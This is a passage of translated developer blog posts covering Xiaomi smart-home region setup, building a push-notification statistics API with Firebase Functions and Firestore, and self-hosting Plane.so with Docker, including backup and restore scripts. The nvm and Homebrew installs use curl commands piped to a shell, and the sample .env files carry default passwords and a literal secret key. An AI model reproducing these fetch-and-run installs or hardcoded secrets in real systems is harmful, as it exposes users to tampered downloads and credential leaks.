This was troublesome, as only the air purifier could not be added; no matter how I tried, it seemed that the pairing methods for Taiwan and China were different. Reluctantly, I had to switch the region back to Taiwan and reset all appliances… The Xiao Ai Speaker was also switched back to Taiwan.
Due to switching the region back to Taiwan, the “Xiao Ai Training” function was lost; it was impossible to set up vocabulary to execute corresponding Mi Home smart home scenes directly in the APP. After multiple attempts, I found that if the smart home is linked and authorized to the Mi Home APP, the scenes and appliances will still automatically link to the Xiao Ai Speaker for authorized control!
My scene “I’m home” could be correctly recognized and executed by the Xiao Ai Speaker, but “I’m leaving” could not be recognized. After trying for an entire afternoon, I found it was a traditional and simplified Chinese issue; when I changed the scene name to “出门” (simplified), the Xiao Ai Speaker could recognize and execute it correctly.
So, friends who have issues with scene execution might want to change the scene name and device name to simplified Chinese.
Done! This way, you can continue to use the Mi Home smart home with the APP region set to Taiwan, maintaining the original experience.
If you have any questions or suggestions, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
When push notification statistics meet Firebase Firestore + Functions
Photo by Carlos Muza
Recently, I wanted to add a feature to the APP. Before implementing it, we could only use the success or failure of posting to APNS/FCM from the backend as the denominator for push notifications and compute the click-through rate from that. However, this method is very inaccurate because the denominator includes many invalid devices: devices where the APP has been deleted (which may not immediately become invalid) or where push notifications are disabled will still return success when the backend posts.
After iOS 10, you can implement the Notification Service Extension to secretly call an API for statistics when the push notification banner appears. The advantage is that it is very accurate; it only calls when the user’s push notification banner appears. If the APP is deleted, notifications are turned off, or the banner is not displayed, there will be no action. The banner appearing equals a push notification message, and using this as the base for push notifications and then counting the clicks will give an “accurate click-through rate.”
For detailed principles and implementation methods, refer to the previous article: “iOS ≥ 10 Notification Service Extension Application (Swift)”
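As a rough idea of the app-side piece (not the article’s actual implementation; the endpoint URL, the pushID key, and the payload fields are placeholders that mirror the API built later in this post), the extension can report “received” roughly like this:
import UserNotifications

class NotificationService: UNNotificationServiceExtension {
    private var contentHandler: ((UNNotificationContent) -> Void)?
    private var bestAttemptContent: UNMutableNotificationContent?

    override func didReceive(_ request: UNNotificationRequest, withContentHandler contentHandler: @escaping (UNNotificationContent) -> Void) {
        self.contentHandler = contentHandler
        self.bestAttemptContent = (request.content.mutableCopy() as? UNMutableNotificationContent)

        // pushID is a placeholder key assumed to be carried in the notification payload.
        guard let pushID = request.content.userInfo["pushID"] as? String,
              let url = URL(string: "https://us-central1-xxx.cloudfunctions.net/notification") else {
            contentHandler(request.content)
            return
        }

        var urlRequest = URLRequest(url: url)
        urlRequest.httpMethod = "POST"
        urlRequest.setValue("application/json", forHTTPHeaderField: "Content-Type")
        urlRequest.httpBody = try? JSONSerialization.data(withJSONObject: ["platformType": "ios", "pushID": pushID, "actionType": "received"])

        // Report "received", then deliver the (unmodified) content so the banner still shows.
        URLSession.shared.dataTask(with: urlRequest) { [weak self] _, _, _ in
            if let bestAttemptContent = self?.bestAttemptContent {
                self?.contentHandler?(bestAttemptContent)
            }
        }.resume()
    }

    override func serviceExtensionTimeWillExpire() {
        // Time is about to run out; deliver whatever we have.
        if let contentHandler = contentHandler, let bestAttemptContent = bestAttemptContent {
            contentHandler(bestAttemptContent)
        }
    }
}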
Currently, the loss rate measured in the APP is roughly 0% in tests. A common practical application is Line’s end-to-end message encryption (the push message is sent encrypted and only decrypted on the phone when it is received).
The work on the APP side is actually not much; both iOS and Android only need to implement similar functions (though if you also target the Chinese Android market, it gets more complicated, since you need to integrate push frameworks for more platforms). The bigger work is on the backend and handling server load: when a push notification goes out, every device calls the API back at roughly the same time, which might exhaust the server’s max connections. If an RDBMS is used to store the records, it can be even worse. If you find statistical losses, they often happen at this stage.
You can record by writing logs to files, then aggregate and display the statistics when they are queried.
Additionally, thinking about the scenario of simultaneous returns, the quantity might not be as large as imagined. Push notifications are not sent out in tens or hundreds of thousands at once but in batches. As long as you can handle the number of simultaneous returns from batch sending, it should be fine!
Considering the issues mentioned, the backend needs effort to research and modify, and the market may not care about the results. So, I thought of using available resources to create a prototype to test the waters.
Here, I chose Firebase services, which almost all APPs use, specifically the Functions and Firestore features.
Functions is a serverless service provided by Google. You only need to write the program logic; Google automatically handles the server and execution environment, so you don’t have to worry about server scaling or traffic.
Firebase Functions are essentially Google Cloud Functions but can only be written in JavaScript (node.js). Although I haven’t tried it, if you use Google Cloud Functions and choose to write in another language while importing Firebase services, it should work as well.
For API usage, I can write a node.js file, get a real URL (e.g., my-project.cloudfunctions.net/getUser), and write the logic to obtain Request information and provide the corresponding Response.
I previously wrote an article about Google Functions: Using Python + Google Cloud Platform + Line Bot to Automate Routine Tasks
Firebase Functions must enable the Blaze plan (pay-as-you-go) to use.
Firebase Firestore is a NoSQL database used to store and manage data.
Combined with Firebase Functions, you can import Firestore during a Request to operate the database and then respond to the user, allowing you to build a simple Restful API service!
Let’s get hands-on!
It is recommended to use NVM, a node.js version management tool, for installation and management (similar to pyenv for Python).
Copy the installation shell script from the NVM GitHub project:
curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.37.2/install.sh | bash
If errors occur during installation, make sure you have a ~/.bashrc or ~/.zshrc file. If not, create one with touch ~/.bashrc or touch ~/.zshrc and rerun the install script.
Next, use nvm install node to install the latest version of node.js. You can check whether npm was installed successfully, and its version, with npm --version. Then install the Firebase CLI tools:
npm install -g firebase-tools
After successful installation, for the first-time use, enter:
firebase login
Complete Firebase login authentication.
Initialize the project:
firebase init
Note the path where Firebase init is located:
You're about to initialize a Firebase project in this directory:
Here you can choose the Firebase CLI tools to install. Use the “↑” and “↓” keys to navigate and the “spacebar” to select. You can choose to install only “Functions” or both “Functions” and “Firestore”.
=== Functions Setup
=== Emulators Setup
You can test Functions and Firestore features and settings locally without it counting towards usage and without needing to deploy online to test.
Install as needed. I installed it but didn’t use it… because it’s just a small feature.
Go to the path noted above, find the functions folder, and open the index.js file with an editor.
index.js:
const functions = require('firebase-functions');
const admin = require('firebase-admin');
admin.initializeApp();

exports.hello = functions.https.onRequest((req, res) => {
  const targetID = req.query.targetID
  const action = req.body.action
  const name = req.body.name

  res.send({"targetID": targetID, "action": action, "name": name});
  return
})
Paste the above content. We have defined a path interface /hello that will return the URL query ?targetID=, plus the POST action and name parameters.
After modifying and saving, go back to the console and run:
firebase deploy
Remember to run the firebase deploy command every time you make changes for them to take effect.
Start verifying & deploying to Firebase…
It may take a while. After Deploy complete!, your first Request & Response endpoint is done!
At this point, you can go back to the Firebase -> Functions page:
You will see the interface and URL location you just wrote.
Copy the URL below and test it in Postman:
Remember to select x-www-form-urlencoded for the POST Body.
Success!
We can use the following in the code to log records:
functions.logger.log("log:", value);
And view the log results in Firebase -> Functions -> Logs:
Create an API that can add, modify, delete, and query articles, and like them.
We want a RESTful API design, so we can’t use the plain path approach from the example above; instead, we need the Express framework.
index.js:
const functions = require('firebase-functions');
const admin = require('firebase-admin');
const express = require('express');
const cors = require('cors');
const app = express();

admin.initializeApp();
app.use(cors({ origin: true }));

// Insert
app.post('/', async (req, res) => { // This POST refers to the HTTP method POST
  const title = req.body.title;
  const content = req.body.content;
  const author = req.body.author;

  if (title == null || content == null || author == null) {
    return res.status(400).send({"message":"Parameter error!"});
  }

  var post = {"title":title, "content":content, "author": author, "created_at": new Date()};
  await admin.firestore().collection('posts').add(post);
  res.status(201).send({"message":"Added successfully!"});
});

exports.post = functions.https.onRequest(app); // This post refers to the /post path
Now we use Express to handle network requests. Here, we first add a POST method handler for the path /; the last line means all of these routes live under /post. Next, we will add APIs for updating and deleting. A quick sketch of calling this endpoint from the app side follows below.
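A minimal sketch of an app-side call to the new insert endpoint (the project URL here is a placeholder for your own Cloud Functions URL):
import Foundation

// POST a new article to the /post endpoint created above.
// "my-project" is a placeholder; use your own Cloud Functions URL.
var request = URLRequest(url: URL(string: "https://us-central1-my-project.cloudfunctions.net/post")!)
request.httpMethod = "POST"
request.setValue("application/x-www-form-urlencoded", forHTTPHeaderField: "Content-Type")
request.httpBody = "title=Hello&content=World&author=zhgchgli".data(using: .utf8)

URLSession.shared.dataTask(with: request) { data, _, _ in
    if let data = data, let body = String(data: data, encoding: .utf8) {
        print(body) // e.g. {"message":"Added successfully!"}
    }
}.resume()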
After successfully deploying with firebase deploy, go back to Postman to test:
Once the Postman request succeeds, you can check in Firebase -> Firestore to see whether the data was written correctly:
index.js:
const functions = require('firebase-functions');
const admin = require('firebase-admin');
const express = require('express');
const cors = require('cors');
const app = express();

admin.initializeApp();
app.use(cors({ origin: true }));

// Update
app.put("/:id", async (req, res) => {
  const title = req.body.title;
  const content = req.body.content;
  const author = req.body.author;
  const doc = await admin.firestore().collection('posts').doc(req.params.id).get();

  if (!doc.exists) {
    return res.status(404).send({"message":"Article not found!"});
  } else if (title == null || content == null || author == null) {
    return res.status(400).send({"message":"Invalid parameters!"});
  }

  var post = {"title":title, "content":content, "author": author};
  await admin.firestore().collection('posts').doc(req.params.id).update(post);
  res.status(200).send({"message":"Update successful!"});
});

exports.post = functions.https.onRequest(app);
Deployment & testing is the same as for adding; remember to change the Postman HTTP method to PUT.
index.js:
const functions = require('firebase-functions');
const admin = require('firebase-admin');
const express = require('express');
const cors = require('cors');
const app = express();

admin.initializeApp();
app.use(cors({ origin: true }));

// Delete
app.delete("/:id", async (req, res) => {
  const doc = await admin.firestore().collection('posts').doc(req.params.id).get();

  if (!doc.exists) {
    return res.status(404).send({"message":"Article not found!"});
  }

  await admin.firestore().collection("posts").doc(req.params.id).delete();
  res.status(200).send({"message":"Article deleted successfully!"});
})

exports.post = functions.https.onRequest(app);
Deployment & testing is the same as for adding; remember to change the Postman HTTP method to DELETE.
Adding, modifying, and deleting are done, let’s do the query!
index.js:
const functions = require('firebase-functions');
const admin = require('firebase-admin');
const express = require('express');
const cors = require('cors');
const app = express();

admin.initializeApp();
app.use(cors({ origin: true }));

// Select List
app.get('/', async (req, res) => {
  const posts = await admin.firestore().collection('posts').get();
  var result = [];
  posts.forEach(doc => {
    let id = doc.id;
    let data = doc.data();
    result.push({"id":id, ...data})
  });
  res.status(200).send({"result":result});
});

// Select One
app.get("/:id", async (req, res) => {
  const doc = await admin.firestore().collection('posts').doc(req.params.id).get();

  if (!doc.exists) {
    return res.status(404).send({"message":"Article not found!"});
  }

  res.status(200).send({"result":{"id":doc.id, ...doc.data()}});
});

exports.post = functions.https.onRequest(app);
Deployment & testing is the same as for adding; remember to change the Postman HTTP method to GET and switch Body back to none.
Sometimes we need to update when the value exists and add when it does not. In this case, we can use set with merge: true:
index.js:
const functions = require('firebase-functions');
const admin = require('firebase-admin');
const express = require('express');
const cors = require('cors');
const app = express();

admin.initializeApp();
app.use(cors({ origin: true }));

// InsertOrUpdate
app.post("/tag", async (req, res) => {
  const name = req.body.name;

  if (name == null) {
    return res.status(400).send({"message":"Invalid parameter!"});
  }

  var tag = {"name":name};
  await admin.firestore().collection('tags').doc(name).set({created_at: new Date()}, {merge: true});
  res.status(201).send({"message":"Added successfully!"});
});

exports.post = functions.https.onRequest(app);
Here, taking adding a tag as an example, deployment & testing is the same as for adding. You can see that Firestore will not repeatedly add new documents.
Suppose our article data now has an additional likeCount field to record the number of likes. How should we do it?
index.js:
const functions = require('firebase-functions');
const admin = require('firebase-admin');
const express = require('express');
const cors = require('cors');
const app = express();

admin.initializeApp();
app.use(cors({ origin: true }));

// Like Post
app.post("/like/:id", async (req, res) => {
  const doc = await admin.firestore().collection('posts').doc(req.params.id).get();
  const increment = admin.firestore.FieldValue.increment(1)

  if (!doc.exists) {
    return res.status(404).send({"message":"Article not found!"});
  }

  await admin.firestore().collection('posts').doc(req.params.id).set({likeCount: increment}, {merge: true});
  res.status(201).send({"message":"Liked successfully!"});
});

exports.post = functions.https.onRequest(app);
Using the increment field value lets you perform a read-and-add-1 operation directly.
However, Firestore has write speed limits: a document can only be written about once per second, so when many people like a post at the same time, concurrent requests may become very slow.
The official solution, “Distributed counters”, is not particularly advanced technology: it simply spreads the count across several shard documents and sums them up when reading.
index.js:
const functions = require('firebase-functions');
const admin = require('firebase-admin');
const express = require('express');
const cors = require('cors');
const app = express();

admin.initializeApp();
app.use(cors({ origin: true }));

// Distributed counters Like Post
app.post("/like2/:id", async (req, res) => {
  const doc = await admin.firestore().collection('posts').doc(req.params.id).get();
  const increment = admin.firestore.FieldValue.increment(1)

  if (!doc.exists) {
    return res.status(404).send({"message":"Article not found!"});
  }

  //1~10
  await admin.firestore().collection('posts').doc(req.params.id).collection("likeCounter").doc("likeCount_"+(Math.floor(Math.random()*10)+1).toString())
    .set({count: increment}, {merge: true});
  res.status(201).send({"message":"Like successful!"});
});

exports.post = functions.https.onRequest(app);
The above spreads the count across shard documents to avoid slow writes; if there are too many shards, the read cost ($$) goes up, but it should still be cheaper than adding a new document for every like.
Use brew to install siege:
brew install siege
p.s If you encounter brew: command not found, please install the brew package management tool first:
/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
After installation, you can run:
siege -c 100 -r 1 -H 'Content-Type: application/json' 'https://us-central1-project.cloudfunctions.net/post/like/id POST {}'
Perform stress testing:
-c 100: 100 concurrent tasks
-r 1: each task executes 1 request
-H 'Content-Type: application/json': required if it is a POST
'https://us-central1-project.cloudfunctions.net/post/like/id POST {}': the POST URL and POST body (e.g., {"name":"1234"})
After execution, you can see the results: successful_transactions: 100 means all 100 transactions succeeded.
You can go back to Firebase -> Firestore to check if there is any Loss Data:
Success!
index.js:
const functions = require('firebase-functions');
const admin = require('firebase-admin');
const express = require('express');
const cors = require('cors');
const app = express();

admin.initializeApp();
app.use(cors({ origin: true }));

// Insert
app.post('/', async (req, res) => {
  const title = req.body.title;
  const content = req.body.content;
  const author = req.body.author;

  if (title == null || content == null || author == null) {
    return res.status(400).send({"message":"Parameter error!"});
  }

  var post = {"title":title, "content":content, "author": author, "created_at": new Date()};
  await admin.firestore().collection('posts').add(post);
  res.status(201).send({"message":"Successfully added!"});
});

// Update
app.put("/:id", async (req, res) => {
  const title = req.body.title;
  const content = req.body.content;
  const author = req.body.author;
  const doc = await admin.firestore().collection('posts').doc(req.params.id).get();

  if (!doc.exists) {
    return res.status(404).send({"message":"Post not found!"});
  } else if (title == null || content == null || author == null) {
    return res.status(400).send({"message":"Parameter error!"});
  }

  var post = {"title":title, "content":content, "author": author};
  await admin.firestore().collection('posts').doc(req.params.id).update(post);
  res.status(200).send({"message":"Successfully updated!"});
});

// Delete
app.delete("/:id", async (req, res) => {
  const doc = await admin.firestore().collection('posts').doc(req.params.id).get();

  if (!doc.exists) {
    return res.status(404).send({"message":"Post not found!"});
  }

  await admin.firestore().collection("posts").doc(req.params.id).delete();
  res.status(200).send({"message":"Post successfully deleted!"});
});

// Select List
app.get('/', async (req, res) => {
  const posts = await admin.firestore().collection('posts').get();
  var result = [];
  posts.forEach(doc => {
    let id = doc.id;
    let data = doc.data();
    result.push({"id":id, ...data})
  });
  res.status(200).send({"result":result});
});

// Select One
app.get("/:id", async (req, res) => {
  const doc = await admin.firestore().collection('posts').doc(req.params.id).get();

  if (!doc.exists) {
    return res.status(404).send({"message":"Post not found!"});
  }

  res.status(200).send({"result":{"id":doc.id, ...doc.data()}});
});

// InsertOrUpdate
app.post("/tag", async (req, res) => {
  const name = req.body.name;

  if (name == null) {
    return res.status(400).send({"message":"Parameter error!"});
  }

  var tag = {"name":name};
  await admin.firestore().collection('tags').doc(name).set({created_at: new Date()}, {merge: true});
  res.status(201).send({"message":"Successfully added!"});
});

// Like Post
app.post("/like/:id", async (req, res) => {
  const doc = await admin.firestore().collection('posts').doc(req.params.id).get();
  const increment = admin.firestore.FieldValue.increment(1)

  if (!doc.exists) {
    return res.status(404).send({"message":"Post not found!"});
  }

  await admin.firestore().collection('posts').doc(req.params.id).set({likeCount: increment}, {merge: true});
  res.status(201).send({"message":"Successfully liked!"});
});

// Distributed counters Like Post
app.post("/like2/:id", async (req, res) => {
  const doc = await admin.firestore().collection('posts').doc(req.params.id).get();
  const increment = admin.firestore.FieldValue.increment(1)

  if (!doc.exists) {
    return res.status(404).send({"message":"Post not found!"});
  }

  //1~10
  await admin.firestore().collection('posts').doc(req.params.id).collection("likeCounter").doc("likeCount_"+(Math.floor(Math.random()*10)+1).toString())
    .set({count: increment}, {merge: true});
  res.status(201).send({"message":"Successfully liked!"});
});

exports.post = functions.https.onRequest(app);
Back to what we initially wanted to do, the push notification statistics feature.
index.js:
const functions = require('firebase-functions');
const admin = require('firebase-admin');
const express = require('express');
const cors = require('cors');
const app = express();

admin.initializeApp();
app.use(cors({ origin: true }));

const validPlatformTypes = ["ios","Android"]
const validActionTypes = ["clicked","received"]

// Insert Log
app.post('/', async (req, res) => {
  const increment = admin.firestore.FieldValue.increment(1);
  const platformType = req.body.platformType;
  const pushID = req.body.pushID;
  const actionType = req.body.actionType;

  if (!validPlatformTypes.includes(platformType) || pushID == undefined || !validActionTypes.includes(actionType)) {
    return res.status(400).send({"message":"Invalid parameters!"});
  } else {
    await admin.firestore().collection(platformType).doc(actionType+"_"+pushID).collection("shards").doc((Math.floor(Math.random()*10)+1).toString())
      .set({count: increment}, {merge: true})
    res.status(201).send({"message":"Record successful!"});
  }
});

// View Log
app.get('/:type/:id', async (req, res) => {
  // received
  const receivedDocs = await admin.firestore().collection(req.params.type).doc("received_"+req.params.id).collection("shards").get();
  var received = 0;
  receivedDocs.forEach(doc => {
    received += doc.data().count;
  });

  // clicked
  const clickedDocs = await admin.firestore().collection(req.params.type).doc("clicked_"+req.params.id).collection("shards").get();
  var clicked = 0;
  clickedDocs.forEach(doc => {
    clicked += doc.data().count;
  });

  res.status(200).send({"received":received,"clicked":clicked});
});

exports.notification = functions.https.onRequest(app);
https://us-central1-xxx.cloudfunctions.net/notification/iOS/1
Additionally, we also created an interface to count push notification numbers.
Since I am not very familiar with node.js, during my initial exploration I did not add await when writing data. Coupled with the write speed limit, this led to data loss under high traffic…
Don’t forget to check the pricing for Firebase Functions & Firestore (computation time and network egress).
Cloud Functions offers a permanent free tier for compute resources: in addition to 2 million invocations, it includes 400,000 GB-seconds and 200,000 GHz-seconds of compute time, as well as 5 GB of internet egress per month.
Prices are subject to change at any time; please refer to the official website for the latest information.
As the title suggests: “for testing”, “for testing”, “for testing”. It is not recommended to use the above services in a production environment or as the core of a launched product.
I once heard of a fairly large service that was built on Firebase; later, with large data volumes and traffic, the charges became extremely expensive, and it was also very difficult to migrate away (the code was fine, but the data was very hard to move). Saving a little money in the early stages caused huge losses later on; not worth it.
For the above reasons, I personally recommend using Firebase Functions + Firestore to build API services only for testing or prototype product demonstrations.
Functions can also integrate Authentication, Storage, but I haven’t researched this part.
If you have any questions or suggestions, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Plane Self-Hosted Docker setup, backup, restore, Nginx Domain reverse proxy configuration tutorial
Plane.so is a free open-source project management tool similar to Asana, Jira, Clickup that supports Self-Hosted setup. It was established in 2022, with the first version released in 2023, and is still under development.
For detailed usage and development process integration, please refer to the previous article “Plane.so Free Open-Source Project Management Tool Similar to Asana/Jira that Supports Self-Hosted”. This article only records the process of setting up Plane.so using Docker.
Docker Compose - Plane In this guide, we will walk you through the process of setting up a self-hosted environment. Self-hosting allows you to… docs.plane.so
We have seen performance degradation beyond 50 users on our recommended 4 GB, 2vCPU infra. Increased infra will help with more users.
This article does not provide an introduction, please refer to the official Docker installation method to complete the local Docker environment installation and configuration. The following takes macOS Docker as an example.
Refer to the official manual.
mkdir plane-selfhost

cd plane-selfhost

curl -fsSL -o setup.sh https://raw.githubusercontent.com/makeplane/plane/master/deploy/selfhost/install.sh

chmod +x setup.sh
./setup.sh
Enter 1 to install (download the Docker images).
Then go to the ./plane-app folder and open the .env configuration file:
APP_RELEASE=stable

WEB_REPLICAS=1
SPACE_REPLICAS=1
ADMIN_REPLICAS=1
API_REPLICAS=1

NGINX_PORT=80
WEB_URL=http://localhost
DEBUG=0
SENTRY_DSN=
SENTRY_ENVIRONMENT=production
CORS_ALLOWED_ORIGINS=http://localhost

#DB SETTINGS
PGHOST=plane-db
PGDATABASE=plane
POSTGRES_USER=plane
POSTGRES_PASSWORD=plane
POSTGRES_DB=plane
POSTGRES_PORT=5432
PGDATA=/var/lib/postgresql/data
DATABASE_URL=

# REDIS SETTINGS
REDIS_HOST=plane-redis
REDIS_PORT=6379
REDIS_URL=

# Secret Key
SECRET_KEY=60gp0byfz2dvffa45cxl20p1scy9xbpf6d8c5y0geejgkyp1b5

# DATA STORE SETTINGS
USE_MINIO=1
AWS_REGION=
AWS_ACCESS_KEY_ID=access-key
AWS_SECRET_ACCESS_KEY=secret-key
AWS_S3_ENDPOINT_URL=http://plane-minio:9000
AWS_S3_BUCKET_NAME=uploads
MINIO_ROOT_USER=access-key
MINIO_ROOT_PASSWORD=secret-key
BUCKET_NAME=uploads
FILE_SIZE_LIMIT=5242880

# Gunicorn Workers
GUNICORN_WORKERS=1

# UNCOMMENT `DOCKER_PLATFORM` IF YOU ARE ON `ARM64` AND DOCKER IMAGE IS NOT AVAILABLE FOR RESPECTIVE `APP_RELEASE`
# DOCKER_PLATFORM=linux/amd64
The default port is :80; if there is a conflict, you can change it here (do not modify docker-compose.yml directly, as it will be overwritten during future Plane updates).
Run ./setup.sh again and enter 2 to start Plane.
Open the site at /. If you see “Instance not configured. Please contact your administrator.”, go to /god-mode/ for the initial setup.
You can access the Plane admin interface at the URL /god-mode/; here you can configure the entire Plane service environment.
General settings.
If you don’t want to set up your own SMTP server, you can use Gmail SMTP directly to send emails:
Host: smtp.gmail.com
Port: 465
Sender: noreply@zhgchg.li
Additionally, since Plane does not currently support Slack notifications, you could run a small SMTP server with a Python script that converts the email notifications into Slack notifications.
Plane service login authentication method. If you want to bind it to only allow email accounts within a Google organization, you can disable “Password based login” and enable only “Google” login. Then generate a login app that is restricted to organizational accounts from the Google login settings.
AI-related settings. Currently, its functionality is limited. If you have a key, you can use AI to help write Issue Descriptions on Issues.
Similarly, its functionality is currently limited. If you have an Unsplash Key, you can fetch and apply images through the Unsplash API when selecting project cover images.
⚠️⚠️Disclaimer⚠️⚠️
The above is an introduction to the 2024-05-25 v0.20-Dev version. The official team is actively developing new features and optimizing user experience. Please refer to the latest version settings.
Once the God/Admin Mode settings are configured, you can use it similarly to the Cloud version.
For detailed usage operations and integration with the development process, please refer to the previous article “ Plane.so Free and Open Source Self-Hosted Asana/Jira-like Project Management Tool “
As mentioned earlier, Plane is still in the development stage, with new versions released approximately every two to three weeks. The changes can be quite significant; it is recommended to read the Release Note carefully for changes and necessary adjustments before upgrading.
⚠️Be sure to back up before upgrading!⚠️ After upgrading, be sure to check if the scheduled backup script is still functioning properly.
⚠️Be sure to back up before upgrading!⚠️ After upgrading, be sure to check if the scheduled backup script is still functioning properly.
⚠️Be sure to back up before upgrading!⚠️ After upgrading, be sure to check if the scheduled backup script is still functioning properly.
Because Plane is in the development stage and unstable, we cannot guarantee that upgrades will not cause data loss. Therefore, it is recommended to back up before operating. The backup method will be explained below.
Upgrade method:
Run ./setup.sh and enter 5 to upgrade Plane (this essentially just pulls the new images and restarts).
The .env file may change after the upgrade; please refer to the Release Notes for any adjustments.
Starting from 0.20-dev, ./setup.sh adds a Backup Data command, but the official manual only describes how to restore that backup to their One paid service. Therefore, I still use my own method to back up uploaded files, Redis, and the PostgreSQL Docker container.
./plane-backup.sh:
#!/bin/bash

# Backup Plane data
# Author: zhgchgli (https://zhgchg.li)

##### Execution Method
# ./plane-backup.sh [backup target directory path] [Plane's Docker project name] [maximum number of Plane backup files to keep, delete the oldest if exceeded]
# e.g. ./plane-backup.sh /backup/plane plane-app 14
###### Settings

# Backup target directory
backup_dir=${1:-.}

# Plane's Docker project name
docker_project_name=${2:-"plane-app"}

# Maximum number of Plane backup files to keep, delete the oldest if exceeded
keep_count=${3:-7}

######

# Check if the directory exists
if [ ! -d "$backup_dir" ]; then
  echo "Backup failed, directory does not exist: $backup_dir"
  exit;
fi

# Remove oldest
count=$(find "$backup_dir" -mindepth 1 -type d | wc -l)

while [ "$count" -ge $keep_count ]; do
  oldest_dir=$(find "$backup_dir" -mindepth 1 -maxdepth 1 -type d | while read dir; do
    # Use stat command to get modification time
    if [[ "$OSTYPE" == "darwin"* ]]; then
      # macOS system
      echo "$(stat -f %m "$dir") $dir"
    else
      # Linux system
      echo "$(stat -c %Y "$dir") $dir"
    fi
  done | sort -n | head -n 1 | cut -d ' ' -f 2-)

  echo "Remove oldest backup: $oldest_dir"
  rm -rf "$oldest_dir"

  count=$(find "$backup_dir" -mindepth 1 -type d | wc -l)
done
#

# Backup new
date_dir=$(date "+%Y_%m_%d_%H_%M_%S")
target_dir="$backup_dir/$date_dir"

mkdir -p "$target_dir"

echo "Backing up to: $target_dir"

# Plane's Postgresql .SQL dump
docker exec -i $docker_project_name-plane-db-1 pg_dump --dbname=postgresql://plane:plane@plane-db/plane -c > $target_dir/dump.sql

# Plane's redis
docker run --rm -v $docker_project_name-redis-1:/volume -v $target_dir:/backup ubuntu tar cvf /backup/plane-app_redis.tar /volume > /dev/null 2>&1

# Plane's uploaded files
docker run --rm -v ${docker_project_name}_uploads:/volume -v $target_dir:/backup ubuntu tar cvf /backup/plane-app_uploads.tar /volume > /dev/null 2>&1

echo "Backup Success!"
The first time you create the script file, remember to run: chmod +x ./plane-backup.sh
Execution method:
./plane-backup.sh [backup target folder path] [Plane Docker project name] [maximum number of backup files to retain; the oldest is deleted if exceeded]
The backup target folder path can be, for example, /backup/plane/ or ./.
Execution example:
./plane-backup.sh /backup/plane plane-app 14
Simply add the above command to crontab to automatically back up Plane at regular intervals.
If you encounter execution errors and cannot find the Container, please check the Plane Docker Compose Project name or verify the script and Docker container names (the official names might have changed).
./plane-restore.sh:
#!/bin/bash

# Restore Plane backup data
# Author: zhgchgli (https://zhgchg.li)

##### Execution method
# ./plane-restore.sh

#
inputBackupDir() {
  read -p "Enter the Plane backup folder to restore (e.g. /backup/plane/2024_05_25_19_14_12): " backup_dir
}
inputBackupDir

if [[ -z $backup_dir ]]; then
  echo "Please provide the backup folder (e.g. sh /backup/docker/plane/2024_04_09_17_46_39)"
  exit;
fi

inputDockerProjectName() {
  read -p "Plane Docker project name (leave blank to use default plane-app): " input_docker_project_name
}
inputDockerProjectName

docker_project_name=${input_docker_project_name:-"plane-app"}

confirm() {
  read -p "Are you sure you want to restore Plane.so data? [y/N] " response

  # Check the response
  case "$response" in
    [yY][eE][sS]|[yY])
      true
      ;;
    *)
      false
      ;;
  esac
}

if ! confirm; then
  echo "Action cancelled."
  exit
fi

# Restore

echo "Restoring..."

docker cp $backup_dir/dump.sql $docker_project_name-plane-db-1:/dump.sql && docker exec -i $docker_project_name-plane-db-1 psql postgresql://plane:plane@plane-db/plane -f /dump.sql

# Restore Redis
docker run --rm -v ${docker_project_name}-redis-1:/volume -v $backup_dir:/backup alpine tar xf /backup/plane-app_redis.tar --strip-components=1 -C /volume

# Restore uploaded files
docker run --rm -v ${docker_project_name}_uploads:/volume -v $backup_dir:/backup alpine tar xf /backup/plane-app_uploads.tar --strip-components=1 -C /volume

echo "Restore Success!"
The first time you create the script file, remember to run: chmod +x ./plane-restore.sh
Execution method:
./plane-restore.sh
Input: The folder of the Plane backup to restore (e.g. /backup/plane/2024_05_25_19_14_12)
Input: The Docker project name of Plane (leave blank to use the default plane-app)
Input: Are you sure you want to restore Plane.so data? [y/N] y
After seeing Restore Success!, you need to restart Plane for it to take effect. Run Plane's ./setup.sh and enter 4 to restart:
Go back to the website, refresh, and log in to the Workspace to check if the restoration was successful:
Done!
⚠️ It is recommended to regularly test the backup and restore process to ensure that the backup can be used in case of an emergency.
As mentioned earlier, Plane is still in the development stage, and a new version is released approximately every two to three weeks, with potentially significant changes. It is recommended to read the Release Note carefully for changes and necessary adjustments before upgrading.
⚠️ Be sure to back up before upgrading! ⚠️ After upgrading, be sure to check if the scheduled backup script is still functioning properly.
⚠️ Be sure to back up before upgrading! ⚠️ After upgrading, be sure to check if the scheduled backup script is still functioning properly.
⚠️ Be sure to back up before upgrading! ⚠️ After upgrading, be sure to check if the scheduled backup script is still functioning properly.
Since Plane is in the development stage and unstable, it cannot be guaranteed that upgrading will not cause data loss. Therefore, it is recommended to back up before operating.
Upgrade method:
Run ./setup.sh again and enter 5 to upgrade Plane (this essentially just pulls the new images and restarts).
The .env file may change after the upgrade; please refer to the Release Notes for any adjustments.
Because we may have multiple web services running at the same time, such as Self-Hosted LibreChat (ChatGPT), Self-Hosted Wiki.js, Self-Hosted Bitwarden, etc., and each service wants port 80 by default, we need to start a Docker Nginx as a reverse proxy if we do not want to specify the port in the URL.
The effect is as follows:
chat.zhgchg.li -> LibreChat :8082
wiki.zhgchg.li -> Wiki.js :8083
pwd.zhgchg.li -> Bitwarden :8084

plane.zhgchg.li -> Plane.so :8081
To achieve the above effect, move the ./plane-selfhost directory into a unified directory, named webServices here.
Final directory structure preview:
Adjust the webServices/plane-selfhost/plane-app/.env environment configuration file:
APP_RELEASE=stable

WEB_REPLICAS=1
SPACE_REPLICAS=1
ADMIN_REPLICAS=1
API_REPLICAS=1

NGINX_PORT=8081
WEB_URL=http://plane.zhgchg.li
DEBUG=0
SENTRY_DSN=
SENTRY_ENVIRONMENT=production
CORS_ALLOWED_ORIGINS=http://plane.zhgchg.li

#DB SETTINGS
PGHOST=plane-db
PGDATABASE=plane
POSTGRES_USER=plane
POSTGRES_PASSWORD=plane
POSTGRES_DB=plane
POSTGRES_PORT=5432
PGDATA=/var/lib/postgresql/data
DATABASE_URL=

# REDIS SETTINGS
REDIS_HOST=plane-redis
REDIS_PORT=6379
REDIS_URL=

# Secret Key
SECRET_KEY=60gp0byfz2dvffa45cxl20p1scy9xbpf6d8c5y0geejgkyp1b5

# DATA STORE SETTINGS
USE_MINIO=1
AWS_REGION=
